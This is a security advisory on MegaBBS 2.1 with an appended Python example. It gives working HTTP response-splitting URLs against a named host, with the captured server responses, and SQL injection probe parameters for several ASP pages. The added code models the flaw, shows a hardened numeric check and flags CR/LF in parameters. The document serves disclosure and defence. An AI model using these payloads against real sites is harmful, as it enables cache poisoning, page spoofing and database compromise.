Program: MegaBBS 2.1
Several vulnerabilities have been found in MegaBBS. A remote user can carry out SQL injection and HTTP Response Splitting attacks.
Examples:
1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ Cache-contro <...>
2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e%0d%0a&action=writenew&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/ Cache-contro <...>
3. SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
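Added example (not part of the original advisory and not MegaBBS code): a Python model of the response splitting in examples 1 and 2, where the decoded fid value reaches the Location header unchanged, shown next to a hardened redirect that accepts only a numeric id and a check that flags query parameters containing CR or LF. The function names and sample query strings are constructed for illustration; only the redirect path is taken from the results above.

```python
from urllib.parse import parse_qsl

# Redirect target as it appears in the Location header of the results above.
REDIRECT_BASE = "/megabbs/forums/forum-view.asp?fid="

# Constructed sample query strings (not captured traffic).
BENIGN_QUERY = "action=writenew&fid=12&tid=4924&displaytype=flat"
SPLIT_QUERY = "action=writenew&fid=%0d%0aX-Constructed:%201&tid=4924&displaytype=flat"


def _param(query, name):
    """Return the URL-decoded value of one query parameter ('' if absent)."""
    return dict(parse_qsl(query, keep_blank_values=True)).get(name, "")


def naive_location(query):
    """Model of the flaw: the decoded fid is copied into the header as-is,
    so a decoded CR LF ends the Location line and starts a new one."""
    return "Location: " + REDIRECT_BASE + _param(query, "fid")


def safe_location(query):
    """Hardened form: fid must be a short run of ASCII digits, otherwise
    the request is rejected before any header is written."""
    fid = _param(query, "fid")
    if not (fid.isascii() and fid.isdigit() and len(fid) <= 10):
        raise ValueError("fid is not a numeric forum id")
    return "Location: " + REDIRECT_BASE + fid


def crlf_params(query):
    """Detection: names of parameters whose decoded value holds CR or LF."""
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if "\r" in value or "\n" in value]


if __name__ == "__main__":
    print(repr(naive_location(SPLIT_QUERY)))   # header text now spans two lines
    print(safe_location(BENIGN_QUERY))
    print(crlf_params(SPLIT_QUERY))
```

The same numeric check applied to memberid, teamid and categoryid would also reject the trailing quote used in the SQL injection examples, though parameterized queries remain the fix for those.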